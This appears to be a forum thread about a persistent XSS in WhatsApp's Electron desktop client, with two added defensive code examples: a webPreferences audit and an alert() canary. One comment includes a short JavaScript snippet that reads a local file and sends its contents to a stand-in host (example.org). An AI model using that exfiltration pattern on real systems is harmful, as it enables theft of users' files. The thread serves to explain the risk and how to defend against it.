> If you're going to use Electron, you HAVE to make sure it is updated with each update of Chromium.
I never really thought about this, but in retrospect, this is so blindingly obvious, and is almost certainly a potential exploit vector to a wide range of Electron-based apps.
The big problem with Electron isn't that it forces you to keep up with Chrome, although that's important too, but rather that it links Node.js with content-controlled Javascript, so that DOM corruption vulnerabilities can be leveraged for RCE, even in the absence of a Chrome vulnerability. Most Electron RCEs that you've read about had nothing to do with Chromium.
There's a whole process for evaluating and auditing Electron applications, which is harder to do than auditing (for instance) a native mobile application or, probably, even a native desktop application.
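The two comments above make the same point: the danger is a renderer that shows remote content while exposed to Node.js, and auditing an Electron app means checking exactly those settings. As an added example (not code from the thread or from Electron itself), here is a small audit of a BrowserWindow `webPreferences` object; the option names are Electron's real ones, while the risk text, the `auditWebPreferences`/`hardenWebPreferences` helpers and the sample config are this example's own.

```javascript
// Option names below are Electron's real BrowserWindow webPreferences keys;
// the risk descriptions and safe values are this example's own guidance.
const RISKY_SETTINGS = [
  { key: "nodeIntegration", bad: true,
    why: "page JavaScript can require() Node modules such as child_process" },
  { key: "nodeIntegrationInWorker", bad: true,
    why: "web workers get Node.js access" },
  { key: "contextIsolation", bad: false,
    why: "preload-script globals are reachable from page JavaScript" },
  { key: "sandbox", bad: false,
    why: "renderer runs outside the Chromium sandbox" },
  { key: "webSecurity", bad: false,
    why: "same-origin policy is disabled" },
  { key: "allowRunningInsecureContent", bad: true,
    why: "HTTPS pages may load scripts over plain HTTP" },
  { key: "enableRemoteModule", bad: true,
    why: "the remote module exposes main-process objects to the renderer" },
];

// Report each risky key that is set to its dangerous value ("high") or left
// unset ("warn"), since the default depends on the Electron version in use.
function auditWebPreferences(prefs) {
  const findings = [];
  for (const s of RISKY_SETTINGS) {
    if (!(s.key in prefs)) {
      findings.push({ key: s.key, level: "warn",
        detail: "not set explicitly; default varies by Electron version" });
    } else if (prefs[s.key] === s.bad) {
      findings.push({ key: s.key, level: "high", detail: s.why });
    }
  }
  return findings;
}

// Return a copy of `prefs` with every risky key forced to its safe value.
function hardenWebPreferences(prefs) {
  const out = { ...prefs };
  for (const s of RISKY_SETTINGS) out[s.key] = !s.bad;
  return out;
}

// Constructed sample: a window showing remote chat content with Node
// integration on and context isolation off, the pairing that turns an XSS
// in the page into code execution on the host.
const weak = { nodeIntegration: true, contextIsolation: false, webSecurity: true };
console.log(auditWebPreferences(weak));
console.log(auditWebPreferences(hardenWebPreferences(weak)));  // []
```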
It sure is. This is why Chrome apps and progressive web apps are great - they share the Chrome runtime and inherit its hardening, security properties and updates.
Many Electron apps should just be a PWA instead, and many actually are. Why would I want to install a desktop app for WhatsApp? It runs just fine in Chrome, and using More Tools -> Create shortcut..., you can even create a launcher entry that will launch the page in its own window.
Wonder if this exploit worked with the Mac App Store version of WhatsApp and the extra sandboxing layer(?) that whole ecosystem provides.
Out of sheer hope and ignorant superstition about the wonders of sandboxing, I tend to install the App Store versions of crap like WhatsApp and Slack whenever possible.
Preview is generated on sender side, preview is generated on client side or preview is generated on some server.
On a "secure" system, as WhatsApp is advertised to be, you'll notice only the second choice is "secure" and possible, since otherwise you'll disclose both your IP and lots of other things, like location (from IP).
It's easy to under appreciate the amount of infrastructure work involved in deploying a production electron app to customers. Auto-updates, code signing, installers etc...
I think it is a good idea to containerize all Electron apps, and run them only in containers. It is because reducing the surface area of your code to the system will reduce the vulnerabilities of your code.
Skype, Slack and WhatsApp are using 250MB each on my machine to do something that was already possible on my 64MB RAM machine 20 years ago. And on top of that they're running one of the most easily hackable runtimes ever. Sure it's fun to mess a bit with a website and remove nag screens here and there, but for an application that is expected to have a trusted encryption system it's just ridiculous.
I hope the pendulum swings back again and we'll see companies start to use cross-platform Rust libraries in some kind of way. I can't imagine you can't reuse 80% of the code that powers those applications in any other way than using some kind of Javascript engine. And perhaps we can just compile it to web using webassembly?
I'm strongly opposed to apps that are just wrappers for web services. I don't need a wrapper when I could just open a browser I trust to patch its vulnerabilities (nod to Firefox). Every Electron app eats so much RAM, it's stupid. And in the end, I'm just using a browser making API calls, why do I need the wrapper?
The thing is that it’s just not a browser making API calls. The wrapper is so that you have access to lower level APIs, like access to the filesystem. This gives the Electron app more power than a browser.
I thought so as well - up until yesterday when I tried the desktop version of Microsoft Outlook. Such an awful experience. Just trying to pick an available meeting room was surprisingly more difficult than on the modern web. And I can hardly see how even Microsoft could bring the web experience to desktop in the future without somehow leveraging the existing online version.
He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
> There are more than 5 different 1-day RCEs in Chromium 69 or higher, you just need to find a published one and use it through the persistent XSS found earlier and BAM: Remote Code Execution ACHIEVED!
> I did not take the time to actually exploit a public RCE
The XSS vulnerability is serious and looks fully deserving of a bug bounty. Likewise, using an old version of Electron is asking for trouble. But for me this PoC should include the extra step of "just" exploiting one of the RCE holes he's sure must exist.
> He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
If you can fetch arbitrary URLs, and the contents of local files, you can trivially exfiltrate the latter with the former. Just fetch the local file, then fetch an URL that encodes the contents of the local file.
var text = await (await fetch("/local/secret/file")).text();
fetch("https://example.org/?d=" + encodeURIComponent(text));
> He didn't really demonstrate how "hackers" could read the file system, right? The screenshot of etc/hosts is on the same computer where that hosts file lives.
Are you saying he could alert it but not exfiltrate it?
Just checked my discord client right now and it's using Chrome 69 through Electron 4.0.8. Haven't had a chance to check a desktop version of Slack yet.
I'm a heavy WhatsApp user and I feel like WhatsApp has gone downhill ever since Facebook took over. Performance is down significantly, I experience a lot more visible bugs, more and more exploits are being revealed about seemingly trivial components (file encryption, browser XSS), and useless features are being added. It's not like WhatsApp Inc. was flawless before they got acquired, but at least it worked well and most of the developers actually wanted to make a great chat app.
It's just a matter of time before Facebook merges WhatsApp with its Messenger (and keeps either of those names).
Heavy WhatsApp user here as well, and I have the total opposite experience: WhatsApp has greatly improved since then. End-to-end encryption, group chats and voice are all working really well right now.
Signal and Telegram are both solid alternatives built around different security models. When I get a notification in Messenger, Instagram, etc., I simply reply back with my contact info for those apps. Telegram gives you a vanity URL using your username, which is pretty cool.
Someone should create a nice little canary.js that reports on alert() etc. being called by setting window.alert = function honeypotFunction(){…};. Although perhaps the noise from extensions and users would make the signal too useless outside of Electron.
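A sketch of the canary.js idea from the comment above, added here as an example and not code from the thread: `installCanary` wraps alert/confirm/prompt on a target (window in a browser, a plain object here so it runs under Node) so that each call is recorded and handed to a reporter, with the popup suppressed unless `passthrough` is set. The function and option names and the collector URL are this example's own assumptions.

```javascript
const CANARY_TARGETS = ["alert", "confirm", "prompt"];

// Replace each popup function on `target` with a wrapper that records the
// call and passes a report object to `report`. Returns an uninstall function.
function installCanary(target, report, options = {}) {
  const passthrough = options.passthrough === true; // default: swallow the popup
  const originals = {};
  for (const name of CANARY_TARGETS) {
    if (typeof target[name] !== "function") continue;
    originals[name] = target[name];
    target[name] = function canaryHoneypot(...args) {
      const event = {
        fn: name,
        // Truncate so an oversized injected string cannot bloat the report.
        message: String(args[0] ?? "").slice(0, 200),
        href: target.location ? String(target.location.href) : null,
        // Skip the "Error" line and this wrapper's own frame.
        stack: (new Error().stack || "").split("\n").slice(2, 7).join("\n"),
        at: new Date().toISOString(),
      };
      try { report(event); } catch (e) { /* reporting must never break the page */ }
      return passthrough ? originals[name].apply(target, args) : undefined;
    };
  }
  return function uninstall() {
    for (const name of Object.keys(originals)) target[name] = originals[name];
  };
}

// Reporter: sendBeacon to a collector in a browser, console output elsewhere.
// The collector URL is a placeholder, not a real endpoint.
function beaconReporter(collectorUrl) {
  return (event) => {
    const body = JSON.stringify(event);
    if (typeof navigator !== "undefined" && navigator.sendBeacon) {
      navigator.sendBeacon(collectorUrl, body);
    } else {
      console.log("canary:", body);
    }
  };
}

// Constructed stand-in for window so the demo runs under Node.
const fakeWindow = { location: { href: "https://app.example/chat" },
                     alert: (m) => `native alert: ${m}` };
installCanary(fakeWindow, beaconReporter("https://collector.example/canary"));
fakeWindow.alert("text from an injected message");  // recorded, popup suppressed
```

In a real deployment the reporter would also want the app's own version string, and the noise the comment predicts (extensions, user-triggered alerts) has to be filtered on the collector side.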
How come WhatsApp has so many security flaws recently and Signal isn't affected? This cannot be coincidence, right? Signal has fewer people working on it, no massive corporation behind the product, more people as smart as Moxie working on it. I don't believe these flaws are just bugs... Right?
Signal has a team of people behind it whose main focus is security and privacy. Of course everyone makes security mistakes, but I'd expect the Signal team to make fewer of them.
In this case, I would say the fewer people working on Signal is a strength, not a weakness.
I'm working on a startup to help solve some of this: https://www.todesktop.com
Feedback appreciated :)
(windows) You can also reverse the process used to package an app: https://www.electronjs.org/docs/tutorial/application-distrib...
You can still see it at both the top and bottom of this archived copy: https://web.archive.org/web/20200204164053/http://www.perime...